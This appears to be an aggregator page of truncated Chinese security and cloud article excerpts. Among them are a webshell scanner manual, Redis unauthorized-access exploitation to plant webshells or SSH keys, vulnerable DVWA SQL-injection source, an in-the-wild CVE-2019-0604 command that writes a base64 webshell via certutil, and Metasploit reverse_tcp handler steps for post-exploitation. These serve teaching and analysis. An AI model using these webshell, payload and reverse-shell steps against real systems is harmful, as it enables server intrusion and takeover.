webshell

河马 webshell扫描器 for Linux 使用手册

白昼怎懂夜的黑 提交于 2020-11-11 14:42:59
安装使用 下载 访问 https://www.shellpub.com 官方网站 点击【立即使用】进入下载中心 选择适合您的版本 linux 64位选择 linux amd64 linux 32位选择 linux 386 可以使用wget进行下载,在按钮上【鼠标右键】->【复制链接地址】 下载64位版本 wget -O /opt/hm-linux.tgz http://dl.shellpub.com/hm/latest/hm-linux-amd64.tgz?version=1.7.0 下载32位版本 wget -O /opt/hm-linux.tgz http://dl.shellpub.com/hm/latest/hm-linux-386.tgz?version=1.7.0 以上路径会随着版本更新而变化,请从下载中心获取最新版本 河马webshell查杀推荐您使用XShell作为ssh客户端,XShell有面向个人学校、教育的免费版本 解压缩 linux压缩包格式是tgz格式的,使用tar gz解压缩 以64位程序为例 cd /opt/ tar xvf hm-linux.tgz 注意: 不要将本软件放置到web目录下 不要在web目录下运行软件 使用 4.1 查看帮助 cd /opt/ ./hm -h 4.2 查看版本 ./hm version 4.3 扫描后门 ./hm

redis未授权访问之利用

匆匆过客 提交于 2020-11-02 14:54:08
文章源自【字节脉搏社区】-字节脉搏实验室 作者-Jadore 扫描下方二维码进入社区 : redis简介 Remote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。 Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 它通常被称为数据结构服务器,因为值(value)可以是 字符串(String), 哈希(Hash), 列表(list), 集合(sets) 和 有序集合(sorted sets)等类型。 redis未授权访问产生原因 Redis 若因配置不当存在未授权访问漏洞,则攻击者可进行恶意利用。当以 root 身份运行时,可以通过root 写入 SSH 公钥文件,直接通过 SSH (默认端口22)登录,从而获取服务器权限。 redis利用场景1:webshell写入 条件:有web服务,知道路径,具有增删改查权限 首先使用redis客户端直接无账号登录redis: 这里假设路径为/home/jadore,可以执行如下命令写入webshell: 靶机上可以看到 edis利用场景2:公私钥免密认证登录SSH 条件:redis以root身份运行 首先我们可以生产一个密钥对,密码为空,命令如下:

dvwa——sql手动注入和sqlmap自动注入

*爱你&永不变心* 提交于 2020-11-02 13:28:01
手动注入 low: 源码: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); // Get results while( $row = mysqli_fetch_assoc( $result ) ) { // Get values $first = $row["first_name"]; $last = $row["last_name"]; // Feedback for end user

CVE-2019-0604在野漏洞利用

梦想的初衷 提交于 2020-10-29 16:52:44
http://dy.163.com/v2/article/detail/F4LUM47A0511CJ6O.html      2019年9月10日,研究人员发现有未知攻击者利用了SharePoint中的安全漏洞(CVE-2019-0604)来安装不同的webshell到中东政府组织的网站上。这些webshell中有一个是开源的AntSword webshell。    CVE-2019-0604漏洞利用   2019年9月10日,研究人员发现了一个请求以下URL的HTTP POST请求,研究人员认为这是SharePoint服务器(CVE-2019-0604)的漏洞利用:   /_layouts/15/picker.aspx   研究人员并没有访问HTTP POST请求中发送的数据,但研究人员发现了SharePoint服务器执行的命令:   C:\Windows\System32\cmd.exe /c echo PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiBEZWJ1Zz0idHJ1ZSIgVHJhY2U9ImZhbHNlIiAlPg[..snip..] > c:\programdata\cmd.txt & certutil -decode c:\programdata\cmd.txt C:\Program Files\Common Files\microsoft

华为云-公有云架构

我怕爱的太早我们不能终老 提交于 2020-10-28 14:28:17
华为云 -公有云架构 华为公有云架构 华为公有云的主要服务如弹性云服务器(ECS)、弹性伸缩服务(AS)、云硬盘 (EVS)、云硬盘备份(VBS)、对象存储服务(OBS) 、虚拟私有云(VPC)、弹性负 载均衡(ELB)、Anti-DDOS流量清洗、云数据库(RDS)、IAM统一身份认证、云监控 服务(CES)、EI、API等云服务产品。 一、 公有云服务架构 1、公有云全堆栈解决方案使能数字化转型 2、华为公有云架构 3、高可用的资源架构模型 二、 公有云服务的主要服务产品 1、 华为云 标准产品体系 2、计算服务:弹性云服务器(ECS) 弹性云服务器( Elastic Cloud Server )是一种可随时自助获取、计算能力可弹性伸缩的云服务器, 3、计算服务:GPU加速云服务器 4、计算服务:弹性伸缩服务(AS) 弹性伸缩服务(Auto Scaling)可根据用户的业务需求和策略,自动调整计算资源,使得云服务器数量可随业务负 载增长而增加,随业务负载降低而减少,保证业务平稳健康运行。 5、存储服务:云硬盘(EVS) 云硬盘(Elastic Volume Service)是一种基于分布式架构的,可弹性扩展的虚拟块存储服务。具有高数据可靠性,高I/O吞吐能力等特点。像使用传统服务器硬盘一样,可以对挂载到云服务器上的云硬盘做格式化、创建文件系统等操作,并对数据持久化存储。 6

Linux安全服务器入侵检测基础

血红的双手。 提交于 2020-10-15 19:49:22
加群交流在后台回复“ 加群 ”,添加小编微信,小编拉你进去 后台回复“ 724 ”获取入门资料 一般服务器被入侵的迹象,包括但不局限于:由内向外发送大量数据包(DDOS肉鸡)、服务器资源被耗尽(挖矿程序)、不正常的端口连接(反向shell等)、服务器日志被恶意删除等。那么既然是入侵检测,首先要判断的是服务器是否被入侵,必须排除是管理员操作不当导致的问题,因此入侵检测的第一项工作就是询问管理员服务器的异常现象,这对之后入侵类型的判断非常重要。  在询问了相关异常信息,排除了管理员操作失误等原因后,那么便可以开始正式的上服务器进行入侵检测以及取证操作了。 一、其他命令 pidof 查看正在运行的名为 的进程 1 pidof filename fuser 可以通过文件或者tcp udp协议看到进程 1 fuser -n tcp port st at 可以看文件修改时间,大小等信息 1 stat filename lsmod 看加载模块 1 lsmod rp cinfo 看rpc服务开放 1 rpcinfo -p dmesg 看网卡是否混杂模式(promiscuous mod) 1 dmesg|grep eth0 二、审计命令 last   这个命令可用于查看我们系统的成功登录、关机、重启等情况,本质就是将/var/log/wtmp文件格式化输出,因此如果该文件被删除,则无法输出结果。

安全日记—零基础开始学安全(2)

大兔子大兔子 提交于 2020-10-09 15:29:57
今日学习的内容: 1. web渗透测试常规套路。 渗透常规思路:目录扫描——发现疑似后台——SQL注入——获取账密——MD5解密——登录后台——获得webshell;整体看下来,基本能理解,但需要找个靶场实操训练下; 2. 改机的基本知识。 改机的原理:通过劫持系统函数,伪造模拟移动端设备的设备信息(包括型号、串码、IMEI、定位、MAC地址、无线名称、手机号等),能够欺骗厂商在设备指纹维度的检测。改机工具会从系统层面劫持获取设备基本信息的接口,厂商app只能得到伪造的假数据。这个知识学到有点晚,之前就遇到过真实案例。通过XPOSE改机,然后劫持唤起摄像头调取的函数,用预先做好的视频或者照片替换摄像头,进而在直播和人脸识别环节进行利用。为什么学习这个,主要是看到了,而且之前还遇到,也算是安全的业务范围吧; 3. 学习点 markdown的进阶知识。 首先自然是字体、颜色什么的,具体内容附到最后,供后面引用吧。不过不得不承认,markdown真的是个好东西,一定要用好; 4. 0day基本常识。经常听到人家说0DAY,因为一直觉得专业的人做专业的事,也就没有了解过,今天开始详细了解了以下,算是扫盲吧。0day泛指所有在官方发布该作品之前或者当天,这主要涵盖了影视、软件、游戏、音乐、资料等方面,由一些特别小组以一定的格式打包发布的数码内容。难怪有些人总是盯着国外那些网站

【教程】黑客是怎样入侵你的网站的

若如初见. 提交于 2020-10-07 06:39:29
扫码免费领黑客教程 (正在为你配置合适的助教) 本文只用于技术讨论,禁止用于非法途径! 这个问题很难回答,简单的来说,入侵一个网站可以有很多种方法。 本文的目的是展示黑客们常用的扫描和入侵网站的技术。 假设你的站点是:hack-test.com 让我们来ping一下这个服务器: 我们得到了一个IP地址:173.236.138.113 – 这是我们目标服务器的IP地址。 Sameip.org 可以帮助我们找到其他与这个服务器绑定的域名: Same IP 26 sites hosted on IP Address 173.236.138.113 有26个站点在这台服务器上(173.236.138.113)。 许多黑客会选择攻击在同服务器上的不同站点从而入侵到你的网站。 但是出于为了学习目的,我们只选择入侵你的服务器。 我们需要从你的站点得到一下信息: 1.DNS记录(A,NS,TXT,MX 和SOA) 2.网站服务器的类型(Apache,IIS,Tomcat) 3.域名的注册信息(哪个公司拥有这个域名) 4.你的名字,地址,EMAIL和电话 5.你的网站上所运行的脚本类型(PHP,ASP,ASP.NET,JSP,CFM) 6.服务器的操作系统类型(Unix,Linux,Windows,Solaris) 7.服务器对外开放的端口(80,443,21,等) 现在让我们来寻找网站的DNS记录

YUNDUN | HW实战,安全随行

情到浓时终转凉″ 提交于 2020-10-04 03:46:02
安全不是纸上谈兵,其本质在于攻守双方的实战对抗。随着5G、AI等新技术引领而来的新时代下,企业数字业务的安全性面临着前所未有的挑战。 攻防演练是检验企业安全体系建设的有效实践,在攻防实战的过程中,面对全开放的环境、海量的账号、不可控的终端,引发企业思考以下几点: 现有 各自割裂、以边界为中心的单点防御体系 ,难以有效应对大规模、高频、高级定向攻击? 攻防信息不对称 ,攻击方层层突破,无力应对0day攻击,稍有疏忽即可能失陷丢分? 攻击突破边界后,投入大量成本正面抗敌, 缺乏迷惑性的战术布防 ,未能有效诱捕攻击者情报,被动处置响应? 重防护、轻运营 ,难以对现有防御能力、应急处置能力的科学评估?缺少整体安全战术布控? 自适应安全架构 YUNDUN基于Gartner自适应安全架构理念,智能联动事前安全预防、事中事件监测与威胁检测、事后响应处置,将针对攻击事件的"应急响应"扩展至针对攻击事件全生命周期的" 持续动态响应 ",实现面向真实互联网各类安全风险的自适应及响应。 积极预防: 赋予安全系统自学习的能力,针对漏洞、内容、泄露、可用性实施多维监控,赋能威胁情报系统,从而构成威胁处理流程的闭环。 纵深防御: 建立全景防御机制,实现防御纵深,减少业务系统被攻击面,提升攻击门槛,确保安全体系面对威胁的及时响应、有效响应。 持续检测: 建立完善的风险识别及威胁告警机制

metaspolit下UAC提权以及日志清除

ぃ、小莉子 提交于 2020-10-03 03:56:02
在获得webshell时但权限不够大,这时候为了完全获得受害者机器的权限,使用msf进行后渗透。 一、获取Meterpreter会话 Meterpreter 是msf的一个payload,目标执行之后,我们会得到一个会话,和常见的shell会话类似,但是它的功能更加强大,它是执行后渗透测试的实施通道。 (1) 使用msfvenom生成payload 常用命令: (2)本地监听 监听需要用到msf的exploit/multi/handler模块,使用show options查看需要设置的参数。重要的参数有三个:监听使用的payload、本地ip、本地监听端口。这些参数的值跟之前msfvenom使用的参数一样。 Msfconsole 打开Metaploit msf>use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.204.129 (3)将生成的payload通过webshell上传到服务器,要上传到可读写的区域并执行 成功监听获得meterpreter(一个session(会话)) Getuid 查看主机名 也可以输入shell变成命令行模式,输入exit返回到meterpeter shell模式 输入background命令让当前会话保存到后台